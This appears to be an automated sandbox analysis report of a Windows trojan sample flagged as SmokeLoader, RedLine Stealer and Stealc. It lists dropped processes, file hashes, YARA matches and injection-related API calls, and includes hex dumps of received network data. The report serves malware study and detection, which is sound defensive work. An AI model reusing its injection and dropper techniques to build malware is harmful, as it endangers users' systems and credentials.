2024-09-02 09:42:52 UTC	1369	IN	Data Raw: 0e ff 15 14 80 45 00 c3 90 80 3d 28 60 45 00 00 74 17 50 50 52 54 6a 02 6a 00 68 e4 fa ed 0e ff 15 14 80 45 00 83 c4 08 58 c3 8d 40 00 54 6a 01 6a 00 68 e0 fa ed 0e ff 15 14 80 45 00 83 c4 04 58 c3 8d 40 00 80 3d 28 60 45 00 01 76 09 50 ff 73 04 e9 d6 ff ff ff c3 90 80 3d 28 60 45 00 01 76 07 50 53 e9 c4 ff ff ff c3 8d 40 00 85 c9 74 19 8b 41 01 80 39 e9 74 0c 80 39 eb 75 0c 0f be c0 41 41 eb 03 83 c1 05 01 c1 c3 8b c0 80 3d 28 60 45 00 01 76 1d 50 52 51 e8 cf ff ff ff 51 54 6a 01 6a 00 68 e1 fa ed 0e ff 15 14 80 45 00 59 59 5a 58 c3 90 80 3d 28 60 45 00 01 76 12 52 54 6a 01 6a 00 68 e2 fa ed 0e ff 15 14 80 45 00 5a c3 50 52 80 3d 28 60 45 00 01 76 10 54 6a 02 6a 00 68 e3 fa ed 0e ff 15 14 80 45 00 5a 58 c3 8b c0 8b 44 24 04 f7 40 04 06 00 00 00 0f 85 13 Data Ascii: E=(`EtPPRTjjhEX@TjjhEX@=(`EvPs=(`EvPS@tA9t9uAA=(`EvPRQQTjjhEYYZX=(`EvRTjjhEZPR=(`EvTjjhEZXD$@
2024-09-02 09:42:52 UTC	1369	IN	Data Raw: 77 0f 8d 44 24 04 50 e8 24 d8 ff ff 83 f8 00 74 71 8b 44 24 04 fc e8 29 f6 ff ff 8b 54 24 08 6a 00 50 68 3a 3a 40 00 52 ff 15 18 80 45 00 8b 5c 24 04 81 3b de fa ed 0e 8b 53 14 8b 43 18 74 1d 8b 15 10 80 45 00 85 d2 0f 84 fa fe ff ff 89 d8 ff d2 85 c0 0f 84 ee fe ff ff 8b 53 0c e8 16 fb ff ff 8b 0d 04 80 45 00 85 c9 74 02 ff d1 8b 4c 24 04 b8 d9 00 00 00 8b 51 14 89 14 24 e9 ba 03 00 00 31 c0 c3 8d 40 00 31 d2 8d 45 f4 64 8b 0a 64 89 02 89 08 c7 40 04 f4 39 40 00 89 68 08 a3 3c 86 45 00 c3 8d 40 00 31 d2 a1 3c 86 45 00 85 c0 74 1c 64 8b 0a 39 c8 75 08 8b 00 64 89 02 c3 8b 09 83 f9 ff 74 08 39 01 75 f5 8b 00 89 01 c3 55 8b ec 53 56 57 bf 38 86 45 00 8b 47 08 85 c0 74 48 8b 5f 0c 8b 70 04 33 d2 55 68 22 3b 40 00 64 ff 32 64 89 22 85 db 7e 12 4b 89 5f 0c 8b Data Ascii: wD$P$tqD$)T$jPh::@RE\$;SCtESEtL$Q$1@1Edd@9@h<E@1<Etd9udt9uUSVW8EGtH_p3Uh";@d2d"~K_

Target ID:	0
Start time:	05:41:54
Start date:	02/09/2024
Path:	C:\Users\user\Desktop\e0OOofAl0S.exe
Wow64 process (32bit):	true
Commandline:	"C:\Users\user\Desktop\e0OOofAl0S.exe"
Imagebase:	0x400000
File size:	221'696 bytes
MD5 hash:	BDAEB131CAED57083370B0C24ED030EB
Has elevated privileges:	true
Has administrator privileges:	true
Programmed in:	C, C++ or other language
Yara matches:	Rule: Windows_Trojan_Smokeloader_3687686f, Description: unknown, Source: 00000000.00000002.1778845801.00000000004A0000.00000040.00001000.00020000.00000000.sdmp, Author: unknown Rule: Windows_Trojan_RedLineStealer_ed346e4c, Description: unknown, Source: 00000000.00000002.1778980791.0000000000534000.00000040.00000020.00020000.00000000.sdmp, Author: unknown Rule: JoeSecurity_SmokeLoader_2, Description: Yara detected SmokeLoader, Source: 00000000.00000002.1779063535.00000000007F1000.00000004.10000000.00040000.00000000.sdmp, Author: Joe Security Rule: Windows_Trojan_Smokeloader_4e31426e, Description: unknown, Source: 00000000.00000002.1779063535.00000000007F1000.00000004.10000000.00040000.00000000.sdmp, Author: unknown Rule: JoeSecurity_SmokeLoader_2, Description: Yara detected SmokeLoader, Source: 00000000.00000002.1778862518.00000000004B0000.00000004.00001000.00020000.00000000.sdmp, Author: Joe Security Rule: Windows_Trojan_Smokeloader_4e31426e, Description: unknown, Source: 00000000.00000002.1778862518.00000000004B0000.00000004.00001000.00020000.00000000.sdmp, Author: unknown
Reputation:	low
Has exited:	true

Show Windows behavior

Target ID:	1
Start time:	05:42:05
Start date:	02/09/2024
Path:	C:\Windows\explorer.exe
Wow64 process (32bit):	false
Commandline:	C:\Windows\Explorer.EXE
Imagebase:	0x7ff72b770000
File size:	5'141'208 bytes
MD5 hash:	662F4F92FDE3557E86D110526BB578D5
Has elevated privileges:	false
Has administrator privileges:	false
Programmed in:	C, C++ or other language
Reputation:	high
Has exited:	false

Show Windows behavior

Target ID:	5
Start time:	05:42:24
Start date:	02/09/2024
Path:	C:\Users\user\AppData\Roaming\busaafd
Wow64 process (32bit):	true
Commandline:	C:\Users\user\AppData\Roaming\busaafd
Imagebase:	0x400000
File size:	221'696 bytes
MD5 hash:	BDAEB131CAED57083370B0C24ED030EB
Has elevated privileges:	false
Has administrator privileges:	false
Programmed in:	C, C++ or other language
Yara matches:	Rule: Windows_Trojan_RedLineStealer_ed346e4c, Description: unknown, Source: 00000005.00000002.2068943563.00000000007A4000.00000040.00000020.00020000.00000000.sdmp, Author: unknown Rule: JoeSecurity_SmokeLoader_2, Description: Yara detected SmokeLoader, Source: 00000005.00000002.2068827308.0000000000701000.00000004.10000000.00040000.00000000.sdmp, Author: Joe Security Rule: Windows_Trojan_Smokeloader_4e31426e, Description: unknown, Source: 00000005.00000002.2068827308.0000000000701000.00000004.10000000.00040000.00000000.sdmp, Author: unknown Rule: JoeSecurity_SmokeLoader_2, Description: Yara detected SmokeLoader, Source: 00000005.00000002.2068728315.00000000005D0000.00000004.00001000.00020000.00000000.sdmp, Author: Joe Security Rule: Windows_Trojan_Smokeloader_4e31426e, Description: unknown, Source: 00000005.00000002.2068728315.00000000005D0000.00000004.00001000.00020000.00000000.sdmp, Author: unknown Rule: Windows_Trojan_Smokeloader_3687686f, Description: unknown, Source: 00000005.00000002.2068696078.00000000005B0000.00000040.00001000.00020000.00000000.sdmp, Author: unknown
Antivirus matches:	Detection: 100%, Joe Sandbox ML
Reputation:	low
Has exited:	true

Show Windows behavior

Target ID:	7
Start time:	05:42:54
Start date:	02/09/2024
Path:	C:\Users\user\AppData\Local\Temp\D931.exe
Wow64 process (32bit):	true
Commandline:	C:\Users\user\AppData\Local\Temp\D931.exe
Imagebase:	0x400000
File size:	3'639'176 bytes
MD5 hash:	17D51083CCB2B20074B1DC2CAC5BEA36
Has elevated privileges:	false
Has administrator privileges:	false
Programmed in:	Borland Delphi
Yara matches:	Rule: JoeSecurity_Crypt, Description: Yara detected CryptOne packer, Source: 00000007.00000002.2308518677.00000000030A9000.00000040.00001000.00020000.00000000.sdmp, Author: Joe Security Rule: JoeSecurity_Keylogger_Generic, Description: Yara detected Keylogger Generic, Source: 00000007.00000002.2308518677.0000000002DA0000.00000040.00001000.00020000.00000000.sdmp, Author: Joe Security Rule: JoeSecurity_DelphiSystemParamCount, Description: Detected Delphi use of System.ParamCount(), Source: 00000007.00000002.2308518677.0000000002DA0000.00000040.00001000.00020000.00000000.sdmp, Author: Joe Security
Antivirus matches:	Detection: 38%, ReversingLabs
Reputation:	low
Has exited:	true

Show Windows behavior

Target ID:	8
Start time:	05:42:59
Start date:	02/09/2024
Path:	C:\Users\user\AppData\Local\Temp\svchost015.exe
Wow64 process (32bit):	true
Commandline:	C:\Users\user\AppData\Local\Temp\svchost015.exe
Imagebase:	0x400000
File size:	2'990'472 bytes
MD5 hash:	B826DD92D78EA2526E465A34324EBEEA
Has elevated privileges:	false
Has administrator privileges:	false
Programmed in:	C, C++ or other language
Yara matches:	Rule: JoeSecurity_Stealc, Description: Yara detected Stealc, Source: 00000008.00000002.2317202796.0000000000CB0000.00000004.00000020.00020000.00000000.sdmp, Author: Joe Security Rule: JoeSecurity_DelphiSystemParamCount, Description: Detected Delphi use of System.ParamCount(), Source: 00000008.00000000.2305216322.0000000000401000.00000020.00000001.01000000.00000007.sdmp, Author: Joe Security Rule: JoeSecurity_Keylogger_Generic, Description: Yara detected Keylogger Generic, Source: C:\Users\user\AppData\Local\Temp\svchost015.exe, Author: Joe Security Rule: JoeSecurity_DelphiSystemParamCount, Description: Detected Delphi use of System.ParamCount(), Source: C:\Users\user\AppData\Local\Temp\svchost015.exe, Author: Joe Security
Antivirus matches:	Detection: 4%, ReversingLabs
Reputation:	moderate
Has exited:	true

Show Windows behavior

Execution Graph

Execution Coverage:	9.3%
Dynamic/Decrypted Code Coverage:	22.6%
Signature Coverage:	38.2%
Total number of Nodes:	212
Total number of Limit Nodes:	5

Executed Functions

Function 0041A7A0 Relevance: 49.3, APIs: 25, Strings: 3, Instructions: 268
librarymemorypipeCOMMON

Download Yara Rule

Control-flow Graph

Executed
Not Executed

APIs

InterlockedExchange.KERNEL32(?,00000000), ref: 0041A84B
SetConsoleTitleA.KERNEL32(00000000), ref: 0041A853
GlobalSize.KERNEL32(00000000), ref: 0041A85B
FindAtomW.KERNEL32(00000000), ref: 0041A863
SearchPathW.KERNEL32(0041C9D0,0041C9A0,0041C960,00000000,?,?), ref: 0041A887
SetConsoleMode.KERNEL32(00000000,00000000), ref: 0041A891
GetDefaultCommConfigW.KERNEL32(00000000,?,00000000), ref: 0041A8B9
CopyFileExA.KERNEL32(0041CA1C,0041CA0C,00000000,00000000,00000000,00000000), ref: 0041A8D1
GetEnvironmentStringsW.KERNEL32 ref: 0041A8D7
WriteConsoleOutputW.KERNEL32(00000000,?,00000000,00000000,?), ref: 0041A8F6
GetNumaNodeProcessorMask.KERNEL32(00000000,00000000), ref: 0041A900
DebugActiveProcessStop.KERNEL32(00000000), ref: 0041A908
GetUserDefaultLangID.KERNEL32 ref: 0041A922
RtlLeaveCriticalSection.NTDLL(?), ref: 0041A936
LoadLibraryA.KERNEL32(00000000), ref: 0041A94F
GetSystemTimes.KERNELBASE(?,?,?), ref: 0041A996
FoldStringW.KERNEL32(00000000,00000000,00000000,00000000,00000000), ref: 0041A9BE
GetConsoleAliasesLengthA.KERNEL32(00000000), ref: 0041A9DD
CallNamedPipeA.KERNEL32(00000000,00000000,00000000,00000000,00000000,00000000,00000000), ref: 0041A9EA
GetComputerNameA.KERNEL32(00000000,00000000), ref: 0041A9F2
GetConsoleAliasExesLengthW.KERNEL32 ref: 0041A9F8
GlobalAlloc.KERNELBASE(00000000,00421ECC), ref: 0041AA3D
LoadLibraryW.KERNELBASE(0041CA54), ref: 0041AA91
GlobalSize.KERNEL32(00000000), ref: 0041AABB
InterlockedDecrement.KERNEL32(?), ref: 0041AAE8

Strings

G9@, xrefs: 0041A818
k`, xrefs: 0041AACD
}$, xrefs: 0041AAEF

Memory Dump Source

Source File: 00000000.00000002.1778740954.000000000040B000.00000020.00000001.01000000.00000003.sdmp, Offset: 0040B000, based on PE: false

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_0_2_40b000_e0OOofAl0S.jbxd

Similarity

API ID: Console$Global$DefaultInterlockedLengthLibraryLoadSize$ActiveAliasAliasesAllocAtomCallCommComputerConfigCopyCriticalDebugDecrementEnvironmentExchangeExesFileFindFoldLangLeaveMaskModeNameNamedNodeNumaOutputPathPipeProcessProcessorSearchSectionStopStringStringsSystemTimesTitleUserWrite
String ID: G9@$k`$}$
API String ID: 1617017930-167184026
Opcode ID: 5c7a4b6f7cbe8a4fd6a37d62c592fd6ae5ac874b6fbd6add716ca7c961466e8b
Instruction ID: 9d0e60e093157893049f9d09ff6ea3b3fc32bdf03ae3aab365a71fc4c352c97f
Opcode Fuzzy Hash: 5c7a4b6f7cbe8a4fd6a37d62c592fd6ae5ac874b6fbd6add716ca7c961466e8b
Instruction Fuzzy Hash: 8D913471645210ABD320AB60DC49BDB7BA4EF4C715F01803AF619A61F0DB785581CBEF

Function 00401476 Relevance: 10.7, APIs: 7, Instructions: 228
nativeCOMMON

Download Yara Rule

Control-flow Graph

Executed
Not Executed

APIs

NtDuplicateObject.NTDLL(?,000000FF,000000FF,?,00000000,00000000,00000002), ref: 00401552
NtCreateSection.NTDLL(?,00000006,00000000,?,00000004,08000000,00000000), ref: 0040157F
NtMapViewOfSection.NTDLL(?,000000FF,?,00000000,00000000,00000000,00000000,00000001,00000000,00000004,?), ref: 004015A2

Memory Dump Source

Source File: 00000000.00000002.1778723687.0000000000400000.00000040.00000001.01000000.00000003.sdmp, Offset: 00400000, based on PE: true

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_0_2_400000_e0OOofAl0S.jbxd

Similarity

API ID: Section$CreateDuplicateObjectView
String ID:
API String ID: 1652636561-0
Opcode ID: 3de5b02cb2e2c7fa4e7952543349b328c549b7155b269d87397cbf519a09e258
Instruction ID: 2930413ebcf3c91ef78c7b899968c143e4494e66a1317453e42a44ae66849b54
Opcode Fuzzy Hash: 3de5b02cb2e2c7fa4e7952543349b328c549b7155b269d87397cbf519a09e258
Instruction Fuzzy Hash: AB7190B1900245AFEB209F51CC49F9FBBB8FF82710F10416AF951AB2E1E7719941CB64

Function 00401493 Relevance: 10.7, APIs: 7, Instructions: 207
nativeCOMMON

Download Yara Rule

Control-flow Graph

Executed
Not Executed

APIs

NtDuplicateObject.NTDLL(?,000000FF,000000FF,?,00000000,00000000,00000002), ref: 00401552
NtCreateSection.NTDLL(?,00000006,00000000,?,00000004,08000000,00000000), ref: 0040157F
NtMapViewOfSection.NTDLL(?,000000FF,?,00000000,00000000,00000000,00000000,00000001,00000000,00000004,?), ref: 004015A2
NtMapViewOfSection.NTDLL(?,?,?,00000000,00000000,00000000,00000000,00000001,00000000,00000004), ref: 004015C0
NtCreateSection.NTDLL(?,0000000E,00000000,?,00000040,08000000,00000000), ref: 00401601
NtMapViewOfSection.NTDLL(?,000000FF,?,00000000,00000000,00000000,00000000,00000001,00000000,00000004,?), ref: 00401632
NtMapViewOfSection.NTDLL(?,?,?,00000000,00000000,00000000,00000000,00000001,00000000,00000020), ref: 00401654

Memory Dump Source

Source File: 00000000.00000002.1778723687.0000000000400000.00000040.00000001.01000000.00000003.sdmp, Offset: 00400000, based on PE: true

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_0_2_400000_e0OOofAl0S.jbxd

Similarity

API ID: Section$View$Create$DuplicateObject
String ID:
API String ID: 1546783058-0
Opcode ID: 6b07d0daf0981b339e06f51f2dc12d8e52020dd5ac61decf53fb611ec55e13ca
Instruction ID: d7c6057c418d322157b37bade1bff21ef7bff7238e112bc1c960839226febb51
Opcode Fuzzy Hash: 6b07d0daf0981b339e06f51f2dc12d8e52020dd5ac61decf53fb611ec55e13ca
Instruction Fuzzy Hash: 41616571900205FBEB209F91CC49FAF7BB8FF85710F10812AF952BA1E5D6B49901DB65

Function 004014AA Relevance: 10.7, APIs: 7, Instructions: 175
nativeCOMMON

Download Yara Rule

Control-flow Graph

Executed
Not Executed

APIs

NtDuplicateObject.NTDLL(?,000000FF,000000FF,?,00000000,00000000,00000002), ref: 00401552
NtCreateSection.NTDLL(?,00000006,00000000,?,00000004,08000000,00000000), ref: 0040157F
NtMapViewOfSection.NTDLL(?,000000FF,?,00000000,00000000,00000000,00000000,00000001,00000000,00000004,?), ref: 004015A2
NtMapViewOfSection.NTDLL(?,?,?,00000000,00000000,00000000,00000000,00000001,00000000,00000004), ref: 004015C0
NtCreateSection.NTDLL(?,0000000E,00000000,?,00000040,08000000,00000000), ref: 00401601
NtMapViewOfSection.NTDLL(?,000000FF,?,00000000,00000000,00000000,00000000,00000001,00000000,00000004,?), ref: 00401632
NtMapViewOfSection.NTDLL(?,?,?,00000000,00000000,00000000,00000000,00000001,00000000,00000020), ref: 00401654

Memory Dump Source

Source File: 00000000.00000002.1778723687.0000000000400000.00000040.00000001.01000000.00000003.sdmp, Offset: 00400000, based on PE: true

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_0_2_400000_e0OOofAl0S.jbxd

Similarity

API ID: Section$View$Create$DuplicateObject
String ID:
API String ID: 1546783058-0
Opcode ID: 5e7c5bef6aecb5ec5585bbfc0cc73ac8645d9480793bf840b238ab738a0ec3f8
Instruction ID: 384a0da1d92476b1279baf81ca3941c4d16b4b8eb8340d8fd65a4e2b9f3dfa72
Opcode Fuzzy Hash: 5e7c5bef6aecb5ec5585bbfc0cc73ac8645d9480793bf840b238ab738a0ec3f8
Instruction Fuzzy Hash: B6513D71A00205BFEF209F91CC49FAF7BB8EF85B00F104129F951BA2E5D6B49905CB64

Function 004014B1 Relevance: 10.7, APIs: 7, Instructions: 173
nativeCOMMON

Download Yara Rule

Control-flow Graph

Executed
Not Executed

APIs

NtDuplicateObject.NTDLL(?,000000FF,000000FF,?,00000000,00000000,00000002), ref: 00401552
NtCreateSection.NTDLL(?,00000006,00000000,?,00000004,08000000,00000000), ref: 0040157F
NtMapViewOfSection.NTDLL(?,000000FF,?,00000000,00000000,00000000,00000000,00000001,00000000,00000004,?), ref: 004015A2
NtMapViewOfSection.NTDLL(?,?,?,00000000,00000000,00000000,00000000,00000001,00000000,00000004), ref: 004015C0
NtCreateSection.NTDLL(?,0000000E,00000000,?,00000040,08000000,00000000), ref: 00401601
NtMapViewOfSection.NTDLL(?,000000FF,?,00000000,00000000,00000000,00000000,00000001,00000000,00000004,?), ref: 00401632
NtMapViewOfSection.NTDLL(?,?,?,00000000,00000000,00000000,00000000,00000001,00000000,00000020), ref: 00401654

Memory Dump Source

Source File: 00000000.00000002.1778723687.0000000000400000.00000040.00000001.01000000.00000003.sdmp, Offset: 00400000, based on PE: true

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_0_2_400000_e0OOofAl0S.jbxd

Similarity

API ID: Section$View$Create$DuplicateObject
String ID:
API String ID: 1546783058-0
Opcode ID: 2742df03783a4af2630757ed973f661598ad208167d61c6187633747a4b73a2d
Instruction ID: 77e294e5c29794052b934d18963121443c47762038f294bdc3221756e3d7f28a
Opcode Fuzzy Hash: 2742df03783a4af2630757ed973f661598ad208167d61c6187633747a4b73a2d
Instruction Fuzzy Hash: 74512C71900209BFEF209F91CC49FEFBBB8EF85B00F104159F951AA2A5E7B09941CB24

Function 004014AD Relevance: 10.7, APIs: 7, Instructions: 172
nativeCOMMON

Download Yara Rule

Control-flow Graph

Executed
Not Executed

APIs

NtDuplicateObject.NTDLL(?,000000FF,000000FF,?,00000000,00000000,00000002), ref: 00401552
NtCreateSection.NTDLL(?,00000006,00000000,?,00000004,08000000,00000000), ref: 0040157F
NtMapViewOfSection.NTDLL(?,000000FF,?,00000000,00000000,00000000,00000000,00000001,00000000,00000004,?), ref: 004015A2
NtMapViewOfSection.NTDLL(?,?,?,00000000,00000000,00000000,00000000,00000001,00000000,00000004), ref: 004015C0
NtCreateSection.NTDLL(?,0000000E,00000000,?,00000040,08000000,00000000), ref: 00401601
NtMapViewOfSection.NTDLL(?,000000FF,?,00000000,00000000,00000000,00000000,00000001,00000000,00000004,?), ref: 00401632
NtMapViewOfSection.NTDLL(?,?,?,00000000,00000000,00000000,00000000,00000001,00000000,00000020), ref: 00401654

Memory Dump Source

Source File: 00000000.00000002.1778723687.0000000000400000.00000040.00000001.01000000.00000003.sdmp, Offset: 00400000, based on PE: true

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_0_2_400000_e0OOofAl0S.jbxd

Similarity

API ID: Section$View$Create$DuplicateObject
String ID:
API String ID: 1546783058-0
Opcode ID: c2d055a4891878af715572554fd1d714be86d732ae2eeb963f093206d5304122
Instruction ID: d83691bfaa908ebf768f39752e331a6567bad0fa9e9ed4c6933609491a97c617
Opcode Fuzzy Hash: c2d055a4891878af715572554fd1d714be86d732ae2eeb963f093206d5304122
Instruction Fuzzy Hash: 0B512B71900245BBEB209F91CC49FAF7BB8EF85B00F104129FA51BA2E5E6B49941CB64

Function 004014D5 Relevance: 10.7, APIs: 7, Instructions: 160
nativeCOMMON

Download Yara Rule

Control-flow Graph

Executed
Not Executed

APIs

NtDuplicateObject.NTDLL(?,000000FF,000000FF,?,00000000,00000000,00000002), ref: 00401552
NtCreateSection.NTDLL(?,00000006,00000000,?,00000004,08000000,00000000), ref: 0040157F
NtMapViewOfSection.NTDLL(?,000000FF,?,00000000,00000000,00000000,00000000,00000001,00000000,00000004,?), ref: 004015A2
NtMapViewOfSection.NTDLL(?,?,?,00000000,00000000,00000000,00000000,00000001,00000000,00000004), ref: 004015C0
NtCreateSection.NTDLL(?,0000000E,00000000,?,00000040,08000000,00000000), ref: 00401601
NtMapViewOfSection.NTDLL(?,000000FF,?,00000000,00000000,00000000,00000000,00000001,00000000,00000004,?), ref: 00401632
NtMapViewOfSection.NTDLL(?,?,?,00000000,00000000,00000000,00000000,00000001,00000000,00000020), ref: 00401654

Memory Dump Source

Source File: 00000000.00000002.1778723687.0000000000400000.00000040.00000001.01000000.00000003.sdmp, Offset: 00400000, based on PE: true

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_0_2_400000_e0OOofAl0S.jbxd

Similarity

API ID: Section$View$Create$DuplicateObject
String ID:
API String ID: 1546783058-0
Opcode ID: c96008d8cce7321b8157e43aa0d4653c0fe8b81337c4837ab356279a75588f9b
Instruction ID: fd495a3767c54d0d9857a4c92bec852555a579275bcd6122a58bb2fbabb6e282
Opcode Fuzzy Hash: c96008d8cce7321b8157e43aa0d4653c0fe8b81337c4837ab356279a75588f9b
Instruction Fuzzy Hash: EF510A71900209BFEF209F91CC49FEFBBB8EF85B10F104159F911AA2A5E7B09941CB24

Function 00402F55 Relevance: 3.2, APIs: 2, Instructions: 168
nativethreadCOMMON

Download Yara Rule

Control-flow Graph

Executed
Not Executed

APIs

RtlCreateUserThread.NTDLL ref: 00403089
NtTerminateProcess.NTDLL ref: 004030A2

Memory Dump Source

Source File: 00000000.00000002.1778723687.0000000000400000.00000040.00000001.01000000.00000003.sdmp, Offset: 00400000, based on PE: true

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_0_2_400000_e0OOofAl0S.jbxd

Similarity

API ID: CreateProcessTerminateThreadUser
String ID:
API String ID: 1921587553-0
Opcode ID: 8dd8c1b6c2a2e81b31e5df05537a0a765b57e58f23bcff5050bac5d1a8738f05
Instruction ID: 385db6ec30348a4611532b2edd8baef849cc63295ecf85ab64ace8f86e30940b
Opcode Fuzzy Hash: 8dd8c1b6c2a2e81b31e5df05537a0a765b57e58f23bcff5050bac5d1a8738f05
Instruction Fuzzy Hash: D9413731218E098FD768EF6CA845B6277D1F798311F6643AAE809D3389EA34DC1183C5

Function 005373AE Relevance: 3.0, APIs: 2, Instructions: 41
processCOMMON

Download Yara Rule

Control-flow Graph

Executed
Not Executed

APIs

CreateToolhelp32Snapshot.KERNEL32(00000008,00000000), ref: 005373D6
Module32First.KERNEL32(00000000,00000224), ref: 005373F6

Memory Dump Source

Source File: 00000000.00000002.1778980791.0000000000534000.00000040.00000020.00020000.00000000.sdmp, Offset: 00534000, based on PE: false

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_0_2_534000_e0OOofAl0S.jbxd

Yara matches

Similarity

API ID: CreateFirstModule32SnapshotToolhelp32
String ID:
API String ID: 3833638111-0
Opcode ID: 3788706d20f5b898e185810e19a2e38a50b9b544ac306a9cd33eedd6d527d18a
Instruction ID: 6c17344ef653223332651af4f9b09b1ee1d0cc312e70c0f6ed1de93aa3090b3d
Opcode Fuzzy Hash: 3788706d20f5b898e185810e19a2e38a50b9b544ac306a9cd33eedd6d527d18a
Instruction Fuzzy Hash: 2CF09C725047156BD7303BF5A88DB6E7BE8BF4D724F100568E652D14C0D770EC454A51

Function 004030B2 Relevance: 1.6, APIs: 1, Instructions: 64
nativeCOMMON

Download Yara Rule

Control-flow Graph

Executed
Not Executed

APIs

NtTerminateProcess.NTDLL ref: 004030A2

Memory Dump Source

Source File: 00000000.00000002.1778723687.0000000000400000.00000040.00000001.01000000.00000003.sdmp, Offset: 00400000, based on PE: true

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_0_2_400000_e0OOofAl0S.jbxd

Similarity

API ID: ProcessTerminate
String ID:
API String ID: 560597551-0
Opcode ID: 65859489a4ee9faed147b0567641968f4d00accd6ffd6793ae8748d9f8272d5d
Instruction ID: 842373eb4463ac9e834e9e22d1360699520a6be1e431551352f4b65e49395860
Opcode Fuzzy Hash: 65859489a4ee9faed147b0567641968f4d00accd6ffd6793ae8748d9f8272d5d
Instruction Fuzzy Hash: BA018E3360D01556C71C9A7848012F56F56D784321F34413BE1566B5D7D63E8A0B5587

Function 004A003C Relevance: 11.0, APIs: 4, Strings: 2, Instructions: 515
memoryCOMMON

Download Yara Rule

Control-flow Graph

Executed
Not Executed

APIs

VirtualAlloc.KERNELBASE(00000000,?,00001000,00000004), ref: 004A024D

Strings

kernel32.dll, xrefs: 004A008F, 004A0095
cess, xrefs: 004A018D

Memory Dump Source

Source File: 00000000.00000002.1778845801.00000000004A0000.00000040.00001000.00020000.00000000.sdmp, Offset: 004A0000, based on PE: false

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_0_2_4a0000_e0OOofAl0S.jbxd

Yara matches

Similarity

API ID: AllocVirtual
String ID: cess$kernel32.dll
API String ID: 4275171209-1230238691
Opcode ID: aaa6c488ea091c11cf1d14b1b8159415dd1a008d9b857f0942c425a8c5fa1e0a
Instruction ID: e8808fda1f18410e8add9b7d654e39f1dace8b15439fa6e8a781bb971e8400d6
Opcode Fuzzy Hash: aaa6c488ea091c11cf1d14b1b8159415dd1a008d9b857f0942c425a8c5fa1e0a
Instruction Fuzzy Hash: 74527874A01229DFDB64CF58C984BA8BBB1BF09304F1480DAE90DAB351DB34AE95DF15

Function 0041AA64 Relevance: 8.8, APIs: 3, Strings: 2, Instructions: 58
libraryCOMMON

Download Yara Rule

Control-flow Graph

Executed
Not Executed

APIs

LoadLibraryW.KERNELBASE(0041CA54), ref: 0041AA91
GlobalSize.KERNEL32(00000000), ref: 0041AABB
InterlockedDecrement.KERNEL32(?), ref: 0041AAE8

Strings

k`, xrefs: 0041AACD
}$, xrefs: 0041AAEF

Memory Dump Source

Source File: 00000000.00000002.1778740954.000000000040B000.00000020.00000001.01000000.00000003.sdmp, Offset: 0040B000, based on PE: false

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_0_2_40b000_e0OOofAl0S.jbxd

Similarity

API ID: DecrementGlobalInterlockedLibraryLoadSize
String ID: k`$}$
API String ID: 2499385582-956986773
Opcode ID: 90d5a7ab82ba47ca7eb1b4750a0015e3dea80a490ed384338c8ca6549050b500
Instruction ID: fcda37833e7166e974b459af4bde307c7f2281d154bce7f8072bdce0eb6676ce
Opcode Fuzzy Hash: 90d5a7ab82ba47ca7eb1b4750a0015e3dea80a490ed384338c8ca6549050b500
Instruction Fuzzy Hash: E31127346892508AC624A760DD457EBB761EF58356F11403FE646822A1CA7854E1CBDF

Function 004A0E0F Relevance: 3.0, APIs: 2, Instructions: 15
COMMON

Download Yara Rule

Control-flow Graph

Executed
Not Executed

APIs

SetErrorMode.KERNELBASE(00000400,?,?,004A0223,?,?), ref: 004A0E19
SetErrorMode.KERNELBASE(00000000,?,?,004A0223,?,?), ref: 004A0E1E

Memory Dump Source

Source File: 00000000.00000002.1778845801.00000000004A0000.00000040.00001000.00020000.00000000.sdmp, Offset: 004A0000, based on PE: false

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_0_2_4a0000_e0OOofAl0S.jbxd

Yara matches

Similarity

API ID: ErrorMode
String ID:
API String ID: 2340568224-0
Opcode ID: 027e3930a8fc815aeaa48c4a19c17906f2e2d358c6b73c72f02d274321b10a64
Instruction ID: 4a69a7ed93f9a29727daf5d7a921b2a81f6fc96308f2a7e4260770afe9c2796a
Opcode Fuzzy Hash: 027e3930a8fc815aeaa48c4a19c17906f2e2d358c6b73c72f02d274321b10a64
Instruction Fuzzy Hash: F8D0123114512877DB002A94DC09BCE7B1CDF09B62F008411FB0DDD180C774994046E9

Function 0041A5C0 Relevance: 1.5, APIs: 1, Instructions: 14
memoryCOMMON

Download Yara Rule

Control-flow Graph

Executed
Not Executed

APIs

VirtualProtect.KERNELBASE(00421D18,00421ECC,00000040,?), ref: 0041A5D8

Memory Dump Source

Source File: 00000000.00000002.1778740954.000000000040B000.00000020.00000001.01000000.00000003.sdmp, Offset: 0040B000, based on PE: false

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_0_2_40b000_e0OOofAl0S.jbxd

Similarity

API ID: ProtectVirtual
String ID:
API String ID: 544645111-0
Opcode ID: 659ae115ffa24a0ab265ce8b874561e83131cef61aa53958ed046fde09d19cf0
Instruction ID: fb7c44a773a415b676b39fc02758dbf11eb15df709cce15dc9b7056abff92ea5
Opcode Fuzzy Hash: 659ae115ffa24a0ab265ce8b874561e83131cef61aa53958ed046fde09d19cf0
Instruction Fuzzy Hash: 47D0A9B820020CABC210CB40EC41E22736CD788200B004268BE0C43260E671B90186A8

Function 00401869 Relevance: 1.3, APIs: 1, Instructions: 64
sleepCOMMON

Download Yara Rule

Control-flow Graph

Executed
Not Executed

APIs

Sleep.KERNELBASE(00001388), ref: 004018B7

Part of subcall function 00401493: NtDuplicateObject.NTDLL(?,000000FF,000000FF,?,00000000,00000000,00000002), ref: 00401552
Part of subcall function 00401493: NtCreateSection.NTDLL(?,00000006,00000000,?,00000004,08000000,00000000), ref: 0040157F

Memory Dump Source

Source File: 00000000.00000002.1778723687.0000000000400000.00000040.00000001.01000000.00000003.sdmp, Offset: 00400000, based on PE: true

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_0_2_400000_e0OOofAl0S.jbxd

Similarity

API ID: CreateDuplicateObjectSectionSleep
String ID:
API String ID: 4152845823-0
